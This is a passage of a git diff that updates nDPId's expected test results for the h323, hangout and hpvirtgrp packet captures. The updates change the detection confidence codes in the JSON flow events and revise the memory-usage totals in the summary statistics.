+00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1198747081344,"flow_last_seen":1198747081402,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1198747081402,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1198747079978,"flow_last_seen":1198747160184,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":369,"flow_tot_l4_payload_len":1098,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1198747160184,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.161","src_port":2034,"dst_port":1719,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} +00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1198747081344,"flow_last_seen":1198747081402,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1198747160184,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":12,"source":"h323.pcap","alias":"nDPId-test","packets-captured":12,"packets-processed":12,"total-skipped-flows":0,"total-l4-payload-len":1297,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":14,"global_ts_msec":1198747160184} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 12/12 @@ -20,9 +20,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872899 bytes -~~ total memory freed........: 5872899 bytes -~~ total allocations/frees...: 118131/118131 +~~ total memory allocated....: 6006533 bytes +~~ total memory freed........: 6006533 bytes +~~ total allocations/frees...: 120893/120893 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 676 chars diff --git a/test/results/hangout.pcap.out b/test/results/hangout.pcap.out index 757609a32..d5c23c6df 100644 --- a/test/results/hangout.pcap.out +++ b/test/results/hangout.pcap.out @@ -2,10 +2,10 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"hangout.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1468516947751} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"hangout.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1468516947751,"flow_last_seen":1468516947751,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1468516947751,"l3_proto":"ip4","src_ip":"74.125.134.127","dst_ip":"10.89.61.13","src_port":19305,"dst_port":56406,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00575{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"hangout.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1468516947751,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1468516947751,"pkt":"CJ4BbNkmACFeRhcmCABFAACEs2cAACwRwp9KfYZ\/Clk9DUtp3FYAcAThAQEAVCESpEJmaHpqc2RpS0drd1gABgAhWWRWSldCNmwzN20xYzhENDpCbU1TU1l3ZHhBT1czSFlYAAAAACAACAABfY2fUviQAAgAFKAHosL2sVKq2EKifFUwLylv3i3sgCgABLYwivQ="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"hangout.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1468516947751,"flow_last_seen":1468516947751,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1468516947751,"l3_proto":"ip4","src_ip":"74.125.134.127","dst_ip":"10.89.61.13","src_port":19305,"dst_port":56406,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"hangout.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1468516947751,"flow_last_seen":1468516947751,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1468516947751,"l3_proto":"ip4","src_ip":"74.125.134.127","dst_ip":"10.89.61.13","src_port":19305,"dst_port":56406,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} 00576{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"hangout.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1468516948761,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1468516948761,"pkt":"CJ4BbNkmACFeRhcmCABFAACEtXUAACwRwJFKfYZ\/Clk9DUtp3FYAcMuPAQEAVCESpEJ2bG8rRTlqWDZMSTAABgAhWWRWSldCNmwzN20xYzhENDpCbU1TU1l3ZHhBT1czSFlYAAAAACAACAABfY2fUviQAAgAFD0l9HkkR5C8mDGwDSrC9i\/8E7pdgCgABPT5D+E="} 00575{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"hangout.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1468516949760,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1468516949760,"pkt":"CJ4BbNkmACFeRhcmCABFAACEuNIAACwRvTRKfYZ\/Clk9DUtp3FYAcJ51AQEAVCESpEJFNlpieTl0eEswU3gABgAhWWRWSldCNmwzN20xYzhENDpCbU1TU1l3ZHhBT1czSFlYAAAAACAACAABfY2fUviQAAgAFGvaO+U3jhYTDCbM5zzzk6bw5Z+5gCgABA724k8="} -00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"hangout.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1468516947751,"flow_last_seen":1468516965768,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":1976,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1468516965768,"l3_proto":"ip4","src_ip":"74.125.134.127","dst_ip":"10.89.61.13","src_port":19305,"dst_port":56406,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} +00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"hangout.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1468516947751,"flow_last_seen":1468516965768,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":1976,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1468516965768,"l3_proto":"ip4","src_ip":"74.125.134.127","dst_ip":"10.89.61.13","src_port":19305,"dst_port":56406,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":19,"source":"hangout.pcap","alias":"nDPId-test","packets-captured":19,"packets-processed":19,"total-skipped-flows":0,"total-l4-payload-len":1976,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1468516965768} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 19/19 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5878202 bytes -~~ total memory freed........: 5878202 bytes -~~ total allocations/frees...: 118135/118135 +~~ total memory allocated....: 6011836 bytes +~~ total memory freed........: 6011836 bytes +~~ total allocations/frees...: 120897/120897 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 836 chars diff --git a/test/results/hpvirtgrp.pcap.out b/test/results/hpvirtgrp.pcap.out index 812e3ab17..15390448a 100644 --- a/test/results/hpvirtgrp.pcap.out +++ b/test/results/hpvirtgrp.pcap.out @@ -4,63 +4,63 @@ 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614852331255,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614852331255,"pkt":"eJS0JASgYDjgxTWgCABFAAA85EJAAD8GMf7AqAJkoCzCQrXqFGfdahKJAAAAAKAC\/\/\/rnAAAAgQFtAQCCAoReGspAAAAAAEDAwg="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614852331284,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614852331284,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnteoCmmbE3WoSimASchDc7QAAAgQFrAAA"} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614852331288,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614852331288,"pkt":"eJS0JASgYDjgxTWgCABFAAAo5ENAAD8GMhHAqAJkoCzCQrXqFGfdahKKAppmxVAQ\/\/9mswAA"} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614852331255,"flow_last_seen":1614852331296,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614852331296,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614852331255,"flow_last_seen":1614852331296,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614852331296,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":16,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":15,"total-skipped-flows":0,"total-l4-payload-len":522,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1614861892925} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614861892925,"flow_last_seen":1614861892925,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614861892925,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614861892925,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614861892925,"pkt":"eJS0JASgYDjgxTWgCABFAAA85WdAAD8GMNnAqAJkoCzCQudAFGcyIeJoAAAAAKAC\/\/9iNQAAAgQFtAQCCAoAALAcAAAAAAEDAwg="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614861892952,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614861892952,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn50AGwaaHMiHiaWASchBDFwAAAgQFrAAA"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614861892955,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614861892955,"pkt":"eJS0JASgYDjgxTWgCABFAAAo5WhAAD8GMOzAqAJkoCzCQudAFGcyIeJpBsGmiFAQ\/\/\/M3AAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614861892925,"flow_last_seen":1614861893049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614861893049,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614852331255,"flow_last_seen":1614852568996,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614861898114,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614861892925,"flow_last_seen":1614861893049,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614861893049,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614852331255,"flow_last_seen":1614852568996,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614861898114,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614861998723,"flow_last_seen":1614861998723,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614861998723,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614861998723,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614861998723,"pkt":"eJS0JASgYDjgxTWgCABFAAA8bUJAAD8GqP7AqAJkoCzCQue8FGe3KQNZAAAAAKAC\/\/8fjgAAAgQFtAQCCAoAAkxNAAAAAAEDAwg="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614861998752,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614861998752,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn57x0ZsiytykDWmASchAM0gAAAgQFrAAA"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614861998755,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614861998755,"pkt":"eJS0JASgYDjgxTWgCABFAAAobUNAAD8GqRHAqAJkoCzCQue8FGe3KQNadGbIs1AQ\/\/+WlwAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614861998723,"flow_last_seen":1614861998769,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614861998769,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614861998723,"flow_last_seen":1614861998769,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614861998769,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":46,"packets-processed":45,"total-skipped-flows":0,"total-l4-payload-len":1566,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":3,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":20,"global_ts_msec":1614876808445} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614876808445,"flow_last_seen":1614876808445,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614876808445,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1614876808445,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614876808445,"pkt":"eJS0JASgYDjgxTWgCABFAAA8MDtAAD8G5gXAqAJkoCzCQuoQFGeH4ylZAAAAAKAC\/\/91KwAAAgQFtAQCCAoAZP0\/AAAAAAEDAwg="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1614876808474,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614876808474,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRn6hA0hHo5h+MpWmASchCiHwAAAgQFrAAA"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1614876808478,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614876808478,"pkt":"eJS0JASgYDjgxTWgCABFAAAoMDxAAD8G5hjAqAJkoCzCQuoQFGeH4ylaNIR6OlAQ\/\/8r5QAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614876808445,"flow_last_seen":1614876811615,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614876811615,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59920,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614861892925,"flow_last_seen":1614861898114,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614876811951,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1614861998723,"flow_last_seen":1614862060713,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1614876811951,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59324,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 